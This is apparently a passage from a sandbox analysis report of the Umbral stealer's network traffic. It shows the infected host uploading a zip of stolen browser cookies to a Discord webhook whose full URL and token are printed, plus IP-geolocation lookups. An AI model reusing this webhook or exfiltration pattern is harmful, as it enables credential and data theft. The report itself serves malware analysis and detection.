                                      2024-09-06 23:48:31 UTC200INData Raw: 20 5f 63 66 75 76 69 64 3d 4b 6c 7a 32 6f 49 31 72 49 38 31 73 4a 69 58 77 6d 45 33 2e 6a 5f 59 5a 34 73 6c 47 4a 6c 44 6a 47 5f 4b 51 4a 75 59 50 6a 76 51 2d 31 37 32 35 36 36 36 35 31 31 37 30 33 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 62 66 32 35 39 62 30 34 39 39 31 34 33 66 39 2d 45 57 52 0d 0a 0d 0a
                                      Data Ascii: _cfuvid=Klz2oI1rI81sJiXwmE3.j_YZ4slGJlDjG_KQJuYPjvQ-1725666511703-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8bf259b0499143f9-EWR


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      46192.168.2.549787162.159.135.232443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:32 UTC684OUTPOST /api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9 HTTP/1.1
                                      Accept: application/json
                                      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                      Content-Type: multipart/form-data; boundary="813bb1a4-ecad-47dc-aab9-54bf0bcadfce"
                                      Host: discord.com
                                      Cookie: __dcfduid=85cdf00e6caa11ef9b3df2c32ce171c1; __sdcfduid=85cdf00e6caa11ef9b3df2c32ce171c137218182d8aa374246002fbc2930300cdb6665d1191f1663e70ffce071df6d96; __cfruid=e26c311cc7ee22793530bb2999f806ab38f7e645-1725666511; _cfuvid=Klz2oI1rI81sJiXwmE3.j_YZ4slGJlDjG_KQJuYPjvQ-1725666511703-0.0.1.1-604800000
                                      Content-Length: 465005
                                      Expect: 100-continue
                                      2024-09-06 23:48:32 UTC25INHTTP/1.1 100 Continue
                                      2024-09-06 23:48:32 UTC40OUTData Raw: 2d 2d 38 31 33 62 62 31 61 34 2d 65 63 61 64 2d 34 37 64 63 2d 61 61 62 39 2d 35 34 62 66 30 62 63 61 64 66 63 65 0d 0a
                                      Data Ascii: --813bb1a4-ecad-47dc-aab9-54bf0bcadfce
                                      2024-09-06 23:48:32 UTC140OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 55 6d 62 72 61 6c 2d 39 32 37 35 33 37 2e 7a 69 70 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 55 6d 62 72 61 6c 2d 39 32 37 35 33 37 2e 7a 69 70 0d 0a 0d 0a
                                      Data Ascii: Content-Type: application/zipContent-Disposition: form-data; name=file; filename=Umbral-927537.zip; filename*=utf-8''Umbral-927537.zip
                                      2024-09-06 23:48:32 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 08 08 00 0d 9e 26 59 1f 2a 43 8d ed 00 00 00 21 01 00 00 23 00 00 00 42 72 6f 77 73 65 72 73 5c 43 6f 6f 6b 69 65 73 5c 43 68 72 6f 6d 65 20 43 6f 6f 6b 69 65 73 2e 74 78 74 7d cc 4b 72 82 30 00 00 d0 75 9c f1 28 a1 09 21 a4 5d 74 01 2d 08 34 02 ca 6f 60 d3 01 a2 a0 83 32 7c 1a 94 d3 77 a6 07 e8 3b c0 53 9a be 6f ba 93 52 f7 37 10 1f 13 0b bc 00 db e0 91 05 30 21 1a d1 de 54 0d 53 a6 23 5d 27 00 87 df 9e 71 04 2a 52 09 c4 08 22 0d 62 b2 dd 28 ff 04 54 67 18 eb 7f 01 43 0c f8 ee 27 a0 18 bf 5b 67 2a 43 7b b7 c0 7d 91 f7 b4 5d 4e 10 c5 ad 91 4e 5d f5 a8 6e 52 a4 c5 52 3b f7 21 5d 33 c7 48 b0 26 29 d9 fb 38 95 8b 3c 0c af 55 99 9f 1b 15 ba c6 3c 14 66 4a fd 80 d3 51 5e 55 3f 73 87 71 25 8c 25 2d 17 ce 1c 34 16 9c bd d2 ec 12 33 f7 ac f6
                                      Data Ascii: PK&Y*C!#Browsers\Cookies\Chrome Cookies.txt}Kr0u(!]t-4o`2|w;SoR70!TS#]'q*R"b(TgC'[g*C{}]NN]nRR;!]3H&)8<U<fJQ^U?sq%%-43
                                      2024-09-06 23:48:32 UTC16355OUTData Raw: 0b 58 e8 b1 ad 3a 0c 5b 87 b1 73 33 9f 1f f4 2b 28 7d 97 ec 9f 95 a8 46 4a 17 56 26 30 61 a2 07 2c 87 83 60 a2 01 52 d9 98 4b ab ed 4f 56 96 7f 5e e2 1d 3e ae 0b d2 d7 77 00 be d9 1d ea 93 95 54 ca 6b 45 2a 73 ed 2f e9 81 23 f5 51 3f 24 50 70 a0 bd 8c 53 86 f4 f6 0b 39 03 ce 9c 86 6a bd 2e 4d 1a 26 1b ac 02 df 7c 56 c4 ff a5 44 98 ee 31 1f 7f 77 79 ef 86 ac 2c 39 32 80 1c d8 fa 49 a6 b7 a1 6b bf 33 9c 01 fb dd 6a 28 6d 31 af d3 6f e3 c2 d4 00 d7 0a da 60 54 72 2c 63 6e ea 85 20 3a 1d 8f 4d eb b2 c5 51 35 49 a4 cd 5a f9 01 ff 1d 26 45 f2 cb e3 98 35 4a d2 af b1 17 07 b7 b1 8f 82 4c 94 fd 9f 79 1c 1d 34 f3 32 08 22 c2 bf da eb 0c 6a 47 07 b1 7b 69 c4 2c 5a da c3 4a 95 58 54 16 b0 f5 a1 30 7e f5 40 63 97 69 66 10 9c 75 da ac 78 bd 44 e3 95 ce 89 43 2a 1b df
                                      Data Ascii: X:[s3+(}FJV&0a,`RKOV^>wTkE*s/#Q?$PpS9j.M&|VD1wy,92Ik3j(m1o`Tr,cn :MQ5IZ&E5JLy42"jG{i,ZJXT0~@cifuxDC*
                                      2024-09-06 23:48:32 UTC16355OUTData Raw: 1d 59 b9 dd 92 42 5d 00 e7 6e af 72 57 9f 4e 2b 7c 55 6c 8e e5 21 22 5f 54 c7 39 b2 53 fc 9b ea 8b 28 4c 69 27 55 85 d6 68 0c 14 1c 8a 58 e3 75 c5 3b 5b d6 53 6b 9a 83 6f c3 35 9b e8 c3 a4 1e c8 a8 c5 fe 2f 5b f0 3e 5a 61 50 f5 b0 22 fe 4e ce e3 5e b1 79 f0 22 e0 ca b1 d1 85 ca 20 56 24 8e 4a 71 3a 07 3d c4 8d d9 bd de 61 92 e1 bc ce 00 a8 9b ad 91 d0 1c ac 22 0d d8 11 52 a3 95 e6 9c d8 76 0d 1f e0 e4 50 0b 48 39 ce 5a a6 a5 5c 8d 07 7c dd 5c 9a 0b 3f 2d 01 0b 2e 17 06 fc 86 18 8d bd 2b 3e dd 3c be 43 57 91 0e 43 93 07 45 d7 aa 0f 0d 2a b7 16 12 d7 96 73 0b 8b c3 3e e8 02 72 0a cf fd db 38 ae 5d 38 92 73 2a 0e 92 ad ee 97 5d 6b d2 dc 1d 85 60 5f d6 7a 3b 55 5f 7b 5a 31 31 91 0e 42 5d 9b 83 94 ed 6c cc ff 67 e5 ca c2 f6 f4 d0 4e 87 bd fb 09 22 5e f9 2f a0
                                      Data Ascii: YB]nrWN+|Ul!"_T9S(Li'UhXu;[Sko5/[>ZaP"N^y" V$Jq:=a"RvPH9Z\|\?-.+><CWCE*s>r8]8s*]k`_z;U_{Z11B]lgN"^/
                                      2024-09-06 23:48:32 UTC16355OUTData Raw: 4f eb 9a b4 7d 35 e6 81 a8 8f 7b 68 f3 4c c6 f7 c2 d0 fa d0 72 75 c0 b9 b1 e4 0f 77 af ce 39 58 49 55 58 6e 76 ad e3 ae d3 c2 05 5f ee ee 8f ff ea b5 90 80 7d 38 56 f3 ca fb ba 9f 97 25 d0 c2 57 71 bf c7 6a 32 d7 68 7e bd 43 15 a6 77 ca 07 f6 9b e8 a4 61 fb 4b e3 a4 f6 f7 97 e4 3a 0d c1 9e 5b b0 22 a9 37 fe e1 98 1d 95 7c 5a 10 87 f4 be f5 aa d7 47 3c 07 79 0c b9 c2 1b 03 55 58 45 ef e4 85 ed f0 89 3c 91 cc 91 2b f7 bf 88 05 9a 07 24 50 8c 1c 5e 79 25 bd c3 af b7 4a de 4e ed d1 c3 f1 23 e3 75 70 f2 00 e1 f6 fa 61 ea 7d 7d ac d5 b9 db b7 02 6f dc 3e 06 22 83 76 72 48 ec 1f f5 c2 df 06 ec d4 0e 6f 16 ee 88 0b 3d e3 32 ab 27 3a b8 8d 42 f1 c3 f5 b8 0f 70 bc 4b 8a 8e 50 bc 16 4d 30 5c 32 21 6e d4 bc 49 2b 81 62 4a 93 34 bb 70 18 51 f8 0d ab 9b 83 44 d9 de df
                                      Data Ascii: O}5{hLruw9XIUXnv_}8V%Wqj2h~CwaK:["7|ZG<yUXE<+$P^y%JN#upa}}o>"vrHo=2':BpKPM0\2!nI+bJ4pQD
                                      2024-09-06 23:48:32 UTC16355OUTData Raw: ef be 6e 5d ec 71 50 9d 72 69 ad 35 5d d7 da 62 ca af 73 69 e9 b0 0e ff ce d3 9e 31 18 44 ce e3 a1 1a 28 cb f4 6a 23 16 55 4c 22 0c 08 19 a8 61 56 15 c1 12 92 a7 b0 a1 84 d8 9a 18 41 8c 52 6e b2 71 b0 78 87 26 a7 9f 36 81 dd 3e 47 37 ee 0f 98 c9 93 dc ac 03 7c 5a 66 62 bb 8b 11 34 78 00 bc 71 7d a0 fd 97 47 c4 45 10 63 3a 9e 42 79 56 3b eb 88 2a 94 a0 df 05 48 1f c2 7f 92 43 ef 45 5c 19 07 d3 f7 c0 3e f4 8b 57 fe d7 ac 96 65 27 11 f0 3c 20 6a 81 3f 38 09 ff f9 d7 9f 54 c9 4d b9 52 c0 da bb b5 7c d5 9e 6f c2 ac da 33 07 55 bd 7c a2 93 f9 e8 71 74 9b b7 95 1b ab ec 2f 65 47 46 9c be f7 49 44 bb ba fc 97 3e 6a cc 0b 09 53 c5 68 b1 ef eb 98 8a 53 e6 c4 59 eb 15 86 cf 37 f9 b1 67 f3 ec e4 47 b4 a4 7b 18 0d 26 da bf 38 ef 87 eb bd c2 cc a6 2d 78 96 3c 18 53 23
                                      Data Ascii: n]qPri5]bsi1D(j#UL"aVARnqx&6>G7|Zfb4xq}GEc:ByV;*HCE\>We'< j?8TMR|o3U|qt/eGFID>jShSY7gG{&8-x<S#
                                      2024-09-06 23:48:32 UTC16355OUTData Raw: 5e 3e 60 c3 13 14 ed 07 2c b2 3e 41 06 db 87 7f 05 f2 7d 4a 77 c3 c2 b2 98 b3 1b 45 c0 f1 5a 02 68 ad 2c 79 36 ed ed 6f cd 4f ca f8 e4 c3 8b b6 6e 71 92 b4 b4 f1 d8 51 09 3b 79 bb e5 73 76 7b 37 f7 ca 45 0a 92 e2 93 5e 4b 53 fa 5f 9e 8f cc 15 ec c9 f5 63 75 bb be 95 df a3 0e 52 22 da 5e ce 18 66 2d 0e 4b f5 62 55 61 d3 6e ba 6d a4 e1 d6 84 30 f1 ec 30 47 14 84 fb 2b d0 ca 5e be 95 d7 ac a4 a8 d6 24 9a 2a 81 39 c4 c2 1b 73 0a e5 d7 1d e3 fc 3f 25 86 68 7d c5 86 77 8b 34 6e 6a 0c b3 c2 3b 2f 60 81 e9 9d 35 16 68 25 14 b5 c8 e4 3b 6c ba 7f 54 7a ff 47 6f fe 0e 81 50 31 f9 39 87 5c 93 c9 39 f8 41 9a 5d 3a aa b5 8b 7b 22 21 16 a0 0d f5 87 ec 56 69 81 85 fe 07 d4 d3 07 ea 55 d8 71 78 01 68 c7 1a f0 48 b6 a1 ff 50 8d ec ef e0 98 7e e2 fa 6a 0b b8 e8 db 55 51 9e
                                      Data Ascii: ^>`,>A}JwEZh,y6oOnqQ;ysv{7E^KS_cuR"^f-KbUanm00G+^$*9s?%h}w4nj;/`5h%;lTzGoP19\9A]:{"!ViUqxhHP~jUQ
                                      2024-09-06 23:48:32 UTC16355OUTData Raw: fa cd fc 9a d4 ef 51 8f 50 f7 69 cc f0 a6 04 29 40 c6 40 8e fd 97 37 aa 1e 0c bf 53 ba 49 79 65 f2 64 c0 31 77 f7 4b 0a ed d8 3f fc 3f b3 d9 77 5f c1 b0 b2 10 10 ff d1 4a b8 81 9f 10 f7 45 24 e7 cc d2 25 b9 a2 51 5e 76 eb fc 0d 07 b9 b5 1d bd 36 b0 8b 88 a5 43 31 30 87 ac 00 1f d4 47 d8 8d ae 1c 21 b8 b1 c9 7d c8 8b f9 14 53 ae 33 29 31 2f a4 77 b3 b7 25 f5 26 48 3f 49 2f ed 05 ee d0 1b 96 22 b3 bd 1a a2 ca 41 8f 68 d5 9b 8c e2 48 bf 3c 06 a2 5f ed 33 3c 60 c4 d2 bb 93 a4 65 f0 1d 8c cb 40 e6 51 58 3b 7a 0a 73 d4 e7 76 94 ab d4 a6 0a 34 f1 2a b2 11 51 79 fb d6 99 b8 c0 e3 99 fa 8b 1d 27 36 a5 b6 13 3f d8 27 1f d0 a6 36 bb 28 5e 3f f8 d1 49 cb 5c 9f 1d 06 fe f2 e6 ce 74 06 d6 e9 76 54 a6 ea c0 f4 d9 9e 13 2c 55 37 67 76 bc 74 80 fb 6e e0 67 c5 1d e7 fb a4
                                      Data Ascii: QPi)@@7SIyed1wK??w_JE$%Q^v6C10G!}S3)1/w%&H?I/"AhH<_3<`e@QX;zsv4*Qy'6?'6(^?I\tvT,U7gvtng
                                      2024-09-06 23:48:32 UTC16355OUTData Raw: 9d 9f 62 ed 35 ac d2 ca 43 f6 1e 0b 2e e0 57 2e f3 66 29 59 2c da 1e 3a 48 0c 6f 40 b3 ca 64 81 ae 47 ee 85 ea ed 3f 09 d5 b6 6e b7 8b 92 02 f2 fd 5b b9 14 f6 dd d2 13 88 0d 46 d2 7c c7 b2 90 59 cb 0c a7 8c 0a 78 10 45 1d 81 43 66 4d 89 2b 81 63 c2 e0 b8 01 83 f2 3f af 0e 8e 07 12 11 89 87 9c f9 6b 06 4f e3 f4 d9 20 a3 4a d0 be 59 82 af a8 de 42 2d b4 eb 18 88 bb a1 6c a0 28 b6 5f 02 0d bd 04 ba 21 8e c9 bf 4d a6 e1 88 1d 24 97 75 8c 5b e3 87 9d be 63 ab 57 8c 68 b7 23 db 97 b9 6f dc d3 0c 1b f3 e4 6b 24 71 eb 3e 44 84 45 e8 a7 3e dd 70 54 5c 33 c4 aa 9b 34 d2 9d 5b ec 4f b3 df 05 0e ac 9a 0c 32 15 bb c4 a8 04 83 22 7f f7 31 08 15 c1 fa 67 ef 27 3e 72 7c 39 ca 88 e0 31 a0 43 a5 59 48 36 58 d3 38 11 1b dd a4 20 f2 3f a7 97 fe 9f 85 f1 00 8a e9 51 70 c9 b7
                                      Data Ascii: b5C.W.f)Y,:Ho@dG?n[F|YxECfM+c?kO JYB-l(_!M$u[cWh#ok$q>DE>pT\34[O2"1g'>r|91CYH6X8 ?Qp
                                      2024-09-06 23:48:33 UTC1369INHTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:48:33 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 4
                                      x-ratelimit-reset: 1725666514
                                      x-ratelimit-reset-after: 1
                                      vary: Accept-Encoding
                                      via: 1.1 google
                                      alt-svc: h3=":443"; ma=86400
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FCUBBRH7apNUwn3gSxA64qb%2BF0j6%2FPnjmUp48eLLHeQXRzGk780o7Thot6qhwePrLKnXUG0Ntqhhe5nLVW6Awoqrv9rDNlbuDrgtE%2FalihP215Vh%2FtV6BedCPK7k"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      X-Content-Type-Options: nosniff
                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                      Server: cloudflare
                                      CF-RAY: 8bf259b6bb8672b1-EWR
                                      40b
                                      {"type":0,"content":"","mentions":[],"mention_roles":[],"attachments":[{"id":"1281762999476158464","filename":"Umbral-927537.zip","size":464781,"url":"https://cdn.discordapp.com/attachments/1277266726186385433/1281762999476158464/Umbral-927537.zip?ex=66dce651&is=66db94d1&hm=6b8f17ebb81cdcc853fb8f1ea20550c92755170750e746e85ea8f96307148391&","proxy_url":"https://media.discordapp.net/attachments/1277266726186385433/12817629994761


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      47192.168.2.549788188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:32 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:32 UTC645INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:32 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:32 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wr2entFfTma8vtmpE%2FgQRXZXPvvj%2Ffb37t6FUj6NgBB2%2FvOzZkZGfIqzzXoXbYE6rqUQ6nHQQb6ZwZAb2OXLXKUNFyd%2Bh%2B7Iq5DLkfyy8XKHg05BaiHQ%2BrXQHTKb0Lim"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf259b74b9e423e-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:32 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      48192.168.2.549790188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:34 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:34 UTC639INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:34 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:34 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R4bw0zOdMwSm5vw%2FntgMXkfDohZV3Mlx0ojRlaJAMmOA1hf5uakB4sH%2BPh3mIYxkDMaLejrkJdVlnVWrViTmp8WUDlvmMYov9JYRh%2FIqSeOSW6qhRfZliVmrKnIrQKDg"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf259c47e40189d-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:34 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      49192.168.2.549795188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:36 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:37 UTC635INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:37 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:37 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wMRZF5tDYyyuCTUvVBZuN1FFV8tASMwFuHd6qlGTTfs72hYdDFGkPtQRPX1elQK92teX191xeYERAPsAaEx9OOag7RtQrpNMI2CdL0SeycWfY7zBZaXTZTE%2BBR6KHPym"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf259d36be641f3-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:37 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      50192.168.2.549799188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:42 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:42 UTC651INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:42 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:42 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gr%2BfQyHIYl7%2FVfZGDMcYSBoiTr0XHUdWL0WpijFjd7Nt8J26AOcXhQCQorih5HBRNJUAr8GRn8yMiqNZ4YJu%2BmRhE6L%2FpeuW9%2BLyQx%2BtfQ%2FAvl9DKm5d%2FGS%2BXFj1CBjY"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf259f45d018ca2-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:42 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      51192.168.2.549800104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:48:42 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:42 UTC737INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:42 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 24609
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VTXSS9YVPBA5969AWDEP4
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dVtb8WVsQLRL5UId89DYORYd1bzEEY4PHWrs7JVYy0Wd9wwFeF9TYIzPKNkLXKR3zQXjeMvlO%2F9x0QV5dEexugQpwbpw9zYAEPVw5Yvzy%2FI0VN9bwZN2L8yE0%2F%2FR"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf259f83e244388-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:42 UTC632INData Raw: 63 30 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c09<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
